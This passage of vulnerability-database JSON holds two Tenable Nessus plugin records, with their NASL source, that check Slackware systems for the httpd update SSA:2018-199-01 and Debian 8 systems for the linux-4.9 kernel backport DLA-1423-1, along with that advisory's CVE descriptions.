are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "Slackware 14.0 / 14.1 / 14.2 / current : httpd (SSA:2018-199-01)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T12:06:22", "vector": "NONE", "value": 5.0}}, "naslFamily": "Slackware Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1333", "CVE-2018-8011"], "modified": "2018-07-20T00:00:00", "cpe": ["cpe:/o:slackware:slackware_linux:14.2", "cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:httpd", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2018-199-01.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111185", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2018-199-01. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111185);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/07/20 18:27:23\");\n\n script_cve_id(\"CVE-2018-1333\", \"CVE-2018-8011\");\n script_xref(name:\"SSA\", value:\"2018-199-01\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / 14.2 / current : httpd (SSA:2018-199-01)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New httpd packages are available for Slackware 14.0, 14.1, 14.2, and\n-current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2018&m=slackware-security.437384\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dd175e6f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"httpd\", pkgver:\"2.4.34\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.34\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"httpd\", pkgver:\"2.4.34\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.34\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"14.2\", pkgname:\"httpd\", pkgver:\"2.4.34\", pkgarch:\"i586\", pkgnum:\"1_slack14.2\")) flag++;\nif (slackware_check(osver:\"14.2\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.34\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.2\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"httpd\", pkgver:\"2.4.34\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"httpd\", pkgver:\"2.4.34\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-07-21T12:22:02", "references": ["https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html", "https://packages.debian.org/source/jessie/linux-4.9"], "pluginID": "111165", "description": "Linux 4.9 has been packaged for Debian 8 as linux-4.9. This provides a supported upgrade path for systems that currently use kernel packages from the 'jessie-backports' suite.\n\nThere is no need to upgrade systems using Linux 3.16, as that kernel version will also continue to be supported in the LTS period.\n\nThis backport does not include the following binary packages :\n\nhyperv-daemons libcpupower1 libcpupower-dev libusbip-dev linux-compiler-gcc-4.9-x86 linux-cpupower linux-libc-dev usbip\n\nOlder versions of most of those are built from other source packages in Debian 8.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.\n\nCVE-2017-5753\n\nFurther instances of code that was vulnerable to Spectre variant 1 (bounds-check bypass) have been mitigated.\n\nCVE-2017-18255\n\nIt was discovered that the performance events subsystem did not properly validate the value of the kernel.perf_cpu_time_max_percent sysctl. Setting a large value could have an unspecified security impact. However, only a privileged user can set this sysctl.\n\nCVE-2018-1118\n\nThe syzbot software found that the vhost driver did not initialise message buffers which would later be read by user processes. A user with access to the /dev/vhost-net device could use this to read sensitive information from the kernel or other users' processes.\n\nCVE-2018-1120\n\nQualys reported that a user able to mount FUSE filesystems can create a process such that when another process attempting to read its command line will be blocked for an arbitrarily long time. This could be used for denial of service, or to aid in exploiting a race condition in the other program.\n\nCVE-2018-1130\n\nThe syzbot software found that the DCCP implementation of sendmsg() does not check the socket state, potentially leading to a NULL pointer dereference. A local user could use this to cause a denial of service (crash). \n\nCVE-2018-3639\n\nMultiple researchers have discovered that Speculative Store Bypass (SSB), a feature implemented in many processors, could be used to read sensitive information from another context. In particular, code in a software sandbox may be able to read sensitive information from outside the sandbox. This issue is also known as Spectre variant 4.\n\nThis update allows the issue to be mitigated on some x86 processors by disabling SSB. This requires an update to the processor's microcode, which is non-free. It may be included in an update to the system BIOS or UEFI firmware, or in a future update to the intel-microcode or amd64-microcode packages.\n\nDisabling SSB can reduce performance significantly, so by default it is only done in tasks that use the seccomp feature. Applications that require this mitigation should request it explicitly through the prctl() system call. Users can control where the mitigation is enabled with the spec_store_bypass_disable kernel parameter.\n\nCVE-2018-5814\n\nJakub Jirasek reported race conditions in the USB/IP host driver. A malicious client could use this to cause a denial of service (crash or memory corruption), and possibly to execute code, on a USB/IP server.\n\nCVE-2018-10021\n\nA physically present attacker who unplugs a SAS cable can cause a denial of service (memory leak and WARN).\n\nCVE-2018-10087, CVE-2018-10124\n\nzhongjiang found that the wait4() and kill() system call implementations did not check for the invalid pid value of INT_MIN. If a user passed this value, the behaviour of the code was formally undefined and might have had a security impact.\n\nCVE-2018-10853\n\nAndy Lutomirski and Mika Penttil&auml; reported that KVM for x86 processors did not perform a necessary privilege check when emulating certain instructions. This could be used by an unprivileged user in a guest VM to escalate their privileges within the guest.\n\nCVE-2018-10876, CVE-2018-10877, CVE-2018-10878, CVE-2018-10879, CVE-2018-10880, CVE-2018-10881, CVE-2018-10882, CVE-2018-10883\n\nWen Xu at SSLab, Gatech, reported that crafted ext4 filesystem images could trigger a crash or memory corruption. A local user able to mount arbitrary filesystems, or an attacker providing filesystems to be mounted, could use this for denial of service or possibly for privilege escalation.\n\nCVE-2018-10940\n\nDan Carpenter reported that the optical disc driver (cdrom) does not correctly validate the parameter to the CDROM_MEDIA_CHANGED ioctl. A user with access to a cdrom device could use this to cause a denial of service (crash).\n\nCVE-2018-11506\n\nPiotr Gabriel Kosinski and Daniel Shapira reported that the SCSI optical disc driver (sr) did not allocate a sufficiently large buffer for sense data. A user with access to a SCSI optical disc device that can produce more than 64 bytes of sense data could use this to cause a denial of service (crash or memory corruption), and possibly for privilege escalation.\n\nCVE-2018-12233\n\nShankara Pailoor reported that a crafted JFS filesystem image could trigger a denial of service (memory corruption). This could possibly also be used for privilege escalation.\n\nCVE-2018-1000204\n\nThe syzbot software found that the SCSI generic driver (sg) would in some circumstances allow reading data from uninitialised buffers, which could include sensitive information from the kernel or other tasks. However, only privileged users with the CAP_SYS_ADMIN or CAP_SYS_RAWIO capability were allowed to do this, so this has little or no security impact.\n\nFor Debian 8 'Jessie', these problems have been fixed in version 4.9.110-1~deb8u1. This update additionally fixes Debian bugs #860900, #872907, #892057, #896775, #897590, and #898137; and includes many more bug fixes from stable updates 4.9.89-4.9.110 inclusive.\n\nWe recommend that you upgrade your linux-4.9 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "reporter": "Tenable", "published": "2018-07-20T00:00:00", "title": "Debian DLA-1423-1 : linux-4.9 new package (Spectre)", "type": "nessus", "enchantments": {"score": {"modified": "2018-07-21T12:22:02", "vector": "NONE", "value": 7.2}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-10882", "CVE-2018-10021", "CVE-2017-18255", "CVE-2018-10877", "CVE-2017-5753", "CVE-2018-10940", "CVE-2018-10880", "CVE-2018-10878", "CVE-2018-11506", "CVE-2018-10853", "CVE-2018-10881", "CVE-2018-1118", "CVE-2018-1130", "CVE-2018-1120", "CVE-2018-5814", "CVE-2018-1000204", "CVE-2018-10883", "CVE-2018-12233", "CVE-2018-10087", "CVE-2018-10124", "CVE-2018-10876", "CVE-2018-10879", "CVE-2018-3639"], "modified": "2018-07-20T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-common-rt", "p-cpe:/a:debian:debian_linux:linux-perf-4.9", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-armhf", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-686-pae", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-686", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-armmp", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686-pae-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686-pae", "cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-686-pae", "p-cpe:/a:debian:debian_linux:linux-doc-4.9", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-marvell", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-common", "p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.9-arm", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-armmp", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-amd64", "p-cpe:/a:debian:debian_linux:linux-support-4.9.0-0.bpo.7", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-rt-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-marvell", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-armmp-lpae", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-i386", "p-cpe:/a:debian:debian_linux:linux-kbuild-4.9", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-armel", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-amd64", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-686-pae-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-rt-686-pae", "p-cpe:/a:debian:debian_linux:linux-manual-4.9", "p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-amd64", "p-cpe:/a:debian:debian_linux:linux-source-4.9"], "id": "DEBIAN_DLA-1423.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111165", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-1423-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111165);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/07/20 18:27:23\");\n\n script_cve_id(\"CVE-2017-18255\", \"CVE-2017-5753\", \"CVE-2018-1000204\", \"CVE-2018-10021\", \"CVE-2018-10087\", \"CVE-2018-10124\", \"CVE-2018-10853\", \"CVE-2018-10876\", \"CVE-2018-10877\", \"CVE-2018-10878\", \"CVE-2018-10879\", \"CVE-2018-10880\", \"CVE-2018-10881\", \"CVE-2018-10882\", \"CVE-2018-10883\", \"CVE-2018-10940\", \"CVE-2018-1118\", \"CVE-2018-1120\", \"CVE-2018-1130\", \"CVE-2018-11506\", \"CVE-2018-12233\", \"CVE-2018-3639\", \"CVE-2018-5814\");\n\n script_name(english:\"Debian DLA-1423-1 : linux-4.9 new package (Spectre)\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Linux 4.9 has been packaged for Debian 8 as linux-4.9. This provides a\nsupported upgrade path for systems that currently use kernel packages\nfrom the 'jessie-backports' suite.\n\nThere is no need to upgrade systems using Linux 3.16, as that kernel\nversion will also continue to be supported in the LTS period.\n\nThis backport does not include the following binary packages :\n\nhyperv-daemons libcpupower1 libcpupower-dev libusbip-dev\nlinux-compiler-gcc-4.9-x86 linux-cpupower linux-libc-dev usbip\n\nOlder versions of most of those are built from other source packages\nin Debian 8.\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks.\n\nCVE-2017-5753\n\nFurther instances of code that was vulnerable to Spectre variant 1\n(bounds-check bypass) have been mitigated.\n\nCVE-2017-18255\n\nIt was discovered that the performance events subsystem did not\nproperly validate the value of the kernel.perf_cpu_time_max_percent\nsysctl. Setting a large value could have an unspecified security\nimpact. However, only a privileged user can set this sysctl.\n\nCVE-2018-1118\n\nThe syzbot software found that the vhost driver did not initialise\nmessage buffers which would later be read by user processes. A user\nwith access to the /dev/vhost-net device could use this to read\nsensitive information from the kernel or other users' processes.\n\nCVE-2018-1120\n\nQualys reported that a user able to mount FUSE filesystems can create\na process such that when another process attempting to read its\ncommand line will be blocked for an arbitrarily long time. This could\nbe used for denial of service, or to aid in exploiting a race\ncondition in the other program.\n\nCVE-2018-1130\n\nThe syzbot software found that the DCCP implementation of sendmsg()\ndoes not check the socket state, potentially leading to a NULL pointer\ndereference. A local user could use this to cause a denial of service\n(crash). \n\nCVE-2018-3639\n\nMultiple researchers have discovered that Speculative Store Bypass\n(SSB), a feature implemented in many processors, could be used to read\nsensitive information from another context. In particular, code in a\nsoftware sandbox may be able to read sensitive information from\noutside the sandbox. This issue is also known as Spectre variant 4.\n\nThis update allows the issue to be mitigated on some x86\nprocessors by disabling SSB. This requires an update to the\nprocessor's microcode, which is non-free. It may be included\nin an update to the system BIOS or UEFI firmware, or in a\nfuture update to the intel-microcode or amd64-microcode\npackages.\n\nDisabling SSB can reduce performance significantly, so by\ndefault it is only done in tasks that use the seccomp\nfeature. Applications that require this mitigation should\nrequest it explicitly through the prctl() system call. Users\ncan control where the mitigation is enabled with the\nspec_store_bypass_disable kernel parameter.\n\nCVE-2018-5814\n\nJakub Jirasek reported race conditions in the USB/IP host driver. A\nmalicious client could use this to cause a denial of service (crash or\nmemory corruption), and possibly to execute code, on a USB/IP server.\n\nCVE-2018-10021\n\nA physically present attacker who unplugs a SAS cable can cause a\ndenial of service (memory leak and WARN).\n\nCVE-2018-10087, CVE-2018-10124\n\nzhongjiang found that the wait4() and kill() system call\nimplementations did not check for the invalid pid value of INT_MIN. If\na user passed this value, the behaviour of the code was formally\nundefined and might have had a security impact.\n\nCVE-2018-10853\n\nAndy Lutomirski and Mika Penttil&auml; reported that KVM for x86\nprocessors did not perform a necessary privilege check when emulating\ncertain instructions. This could be used by an unprivileged user in a\nguest VM to escalate their privileges within the guest.\n\nCVE-2018-10876, CVE-2018-10877, CVE-2018-10878, CVE-2018-10879,\nCVE-2018-10880, CVE-2018-10881, CVE-2018-10882, CVE-2018-10883\n\nWen Xu at SSLab, Gatech, reported that crafted ext4 filesystem images\ncould trigger a crash or memory corruption. A local user able to mount\narbitrary filesystems, or an attacker providing filesystems to be\nmounted, could use this for denial of service or possibly for\nprivilege escalation.\n\nCVE-2018-10940\n\nDan Carpenter reported that the optical disc driver (cdrom) does not\ncorrectly validate the parameter to the CDROM_MEDIA_CHANGED ioctl. A\nuser with access to a cdrom device could use this to cause a denial of\nservice (crash).\n\nCVE-2018-11506\n\nPiotr Gabriel Kosinski and Daniel Shapira reported that the SCSI\noptical disc driver (sr) did not allocate a sufficiently large buffer\nfor sense data. A user with access to a SCSI optical disc device that\ncan produce more than 64 bytes of sense data could use this to cause a\ndenial of service (crash or memory corruption), and possibly for\nprivilege escalation.\n\nCVE-2018-12233\n\nShankara Pailoor reported that a crafted JFS filesystem image could\ntrigger a denial of service (memory corruption). This could possibly\nalso be used for privilege escalation.\n\nCVE-2018-1000204\n\nThe syzbot software found that the SCSI generic driver (sg) would in\nsome circumstances allow reading data from uninitialised buffers,\nwhich could include sensitive information from the kernel or other\ntasks. However, only privileged users with the CAP_SYS_ADMIN or\nCAP_SYS_RAWIO capability were allowed to do this, so this has little\nor no security impact.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n4.9.110-1~deb8u1. This update additionally fixes Debian bugs #860900,\n#872907, #892057, #896775, #897590, and #898137; and includes many\nmore bug fixes from stable updates 4.9.89-4.9.110 inclusive.\n\nWe recommend that you upgrade your linux-4.9 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/linux-4.9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-compiler-gcc-4.9-arm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-doc-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-armel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-armhf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-all-i386\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-common-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-marvell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-rt-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-headers-4.9.0-0.bpo.7-rt-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-armmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-armmp-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-marvell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-686-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-686-pae-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-amd64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-image-4.9.0-0.bpo.7-rt-amd64-dbg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-kbuild-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-manual-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-perf-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-source-4.9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:linux-support-4.9.0-0.bpo.7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/18\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"linux-compiler-gcc-4.9-arm\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-doc-4.9\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-686\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-686-pae\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all-amd64\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all-armel\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all-armhf\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-all-i386\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-amd64\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-armmp\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-armmp-lpae\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-common\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-common-rt\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-marvell\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-rt-686-pae\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-headers-4.9.0-0.bpo.7-rt-amd64\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-686\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-686-pae\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-686-pae-dbg\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"linux-image-4.9.0-0.bpo.7-amd64\", reference:\"4.9.110-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", 